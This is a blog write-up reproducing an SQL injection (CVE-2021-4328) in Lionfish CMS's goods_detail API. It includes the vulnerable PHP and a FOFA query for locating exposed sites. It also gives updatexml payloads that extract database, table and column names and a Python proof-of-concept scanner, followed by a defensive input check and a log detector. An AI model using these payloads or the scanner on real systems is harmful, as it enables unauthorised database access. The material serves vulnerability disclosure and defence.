CVE-2021-4328: 狮子鱼CMS (Lionfish CMS) ApiController.class.php SQL injection vulnerability reproduction - n00bk1ng's den
A vulnerability has been found in 狮子鱼CMS and classified as critical. Affected by this vulnerability is the function goods_detail of the file ApiController.class.php. The manipulation of the argument goods_id leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning, which is why information about affected and unaffected releases is unavailable. The associated identifier of this vulnerability is VDB-222223.
08/07
狮子鱼CMS (Lionfish CMS)
Built on WeChat mini-programs, it lets merchants quickly set up a community group-buying platform around community, social-group and social resources, centralising operations and management and making it easy to handle the main sales scenarios: group leaders, goods, orders, stocking and delivery, after-sales and financial settlement. Community WeChat groups started by parcel pick-up points, property management offices, homeowners and others each act as a community store.
FOFA search
body="/seller.php?s=/Public/login"
Root cause
public function goods_detail()
{
    // goods_id is read straight from the query string: no integer cast, no escaping
    $goods_id = I('get.goods_id');
    //gallery =>img_url
    //goods goods.goods_desc goods_name group_price market_price sell_count group_number
    // ...and is concatenated verbatim into the SQL string; this is the injection point
    $sql="select g.*,gd.description,gd.summary,gd.tag from ".
        C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;
    $goods_arr=M()->query($sql);
    $qian=array("\r\n");
    $hou=array("<br/>");
    $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']);
    // the same unsanitised value is reused in a second concatenated query
    $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
    $goods_image=M()->query($sql);
    $gallery = array();
    $default_image = '';
    foreach($goods_image as $val)
    {
        $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];
        if(empty($default_image))
        {
            $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
        }
        $gallery[] = array('img_url' => $val['img_url']);
    }
    $goods = $goods_arr[0];
Path and parameter location
Path: /index.php?s=api/goods_detail&goods_id=1 (injectable parameter: goods_id)
Reproduction
Database name: 1 and updatexml(0,concat(0x7e,(database())),0)
Table name: 1 and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)
Column name: 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='<db_name>' and table_name='<table_name>' limit 0,1),0x7e),1)
POC
# -*- coding:utf-8 -*-
import requests
import sys
import urllib3

urllib3.disable_warnings()  # suppress the HTTPS certificate warning

# error-based probe: goods_id is never cast to an integer, so the appended condition reaches the query
vuln_path = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"

def POC(url):
    target_url = url + vuln_path
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        response = requests.get(url=target_url, headers=headers, verify=False, timeout=10)
        print("正在测试:", target_url)
        # the MySQL "XPATH syntax error" raised by updatexml is echoed in the response body
        if "syntax" in response.text:
            print("上述地址存在SQL注入")
    except Exception:
        print("请求失败!")
        sys.exit(0)

if __name__ == '__main__':
    print("python3 poc.py http://xx.xx.xx.xx")
    addr = str(input("Please input url"))
    POC(addr)
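As an added example that is not part of the original post, the following Python shows the defender's side of the same bug: a whitelist check on goods_id equivalent to the integer cast the handler is missing, and a scan over constructed access-log lines (the IPs, timestamps and log lines are made up for the demo) that flags goods_detail requests whose goods_id is not a plain integer, including the updatexml payloads shown above.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined format, trimmed); the injected
# values are the post's own updatexml payloads as they appear URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2023:10:01:02 +0800] "GET /index.php?s=api/goods_detail&goods_id=1 HTTP/1.1" 200 4321
203.0.113.5 - - [07/Aug/2023:10:01:09 +0800] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) HTTP/1.1" 500 812
198.51.100.9 - - [07/Aug/2023:10:02:11 +0800] "GET /index.php?s=api/goods_list HTTP/1.1" 200 9000
203.0.113.7 - - [07/Aug/2023:10:03:30 +0800] "GET /index.php?s=api/goods_detail&goods_id=1+and+updatexml(0,concat(0x7e,(SELECT+table_name+FROM+information_schema.tables+LIMIT+0,1)),0) HTTP/1.1" 500 812
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_valid_goods_id(value: str) -> bool:
    """The check the handler is missing: goods_id must be digits only, so
    '1 and updatexml(...)' never reaches the concatenated SQL. Same effect
    as casting with intval() (I('get.goods_id', 0, 'intval') in ThinkPHP)."""
    return re.fullmatch(r"[0-9]+", value) is not None

def inspect_request(target: str) -> Optional[dict]:
    """Flag a request to s=api/goods_detail whose goods_id is not a plain integer.
    parse_qs decodes %20 and '+', so the payload is matched in decoded form."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if parts.path != "/index.php" or qs.get("s", [""])[0] != "api/goods_detail":
        return None
    goods_id = qs.get("goods_id", [""])[0]
    if is_valid_goods_id(goods_id):
        return None
    # error-based probing via updatexml/extractvalue, as in the post's payloads
    probe = re.search(r"updatexml\(|extractvalue\(", goods_id, re.I) is not None
    return {"goods_id": goods_id, "error_based": probe}

def scan_log(text: str) -> List[dict]:
    """Run inspect_request over every parsable log line and return the findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        finding = inspect_request(m["target"])
        if finding is not None:
            finding.update(ip=m["ip"], time=m["ts"], status=int(m["status"]))
            hits.append(finding)
    return hits
```

A 500 on goods_detail paired with a non-numeric goods_id is the signature of the error-based probe; the same is_valid_goods_id check, applied in the controller before the string concatenation, is what closes the hole.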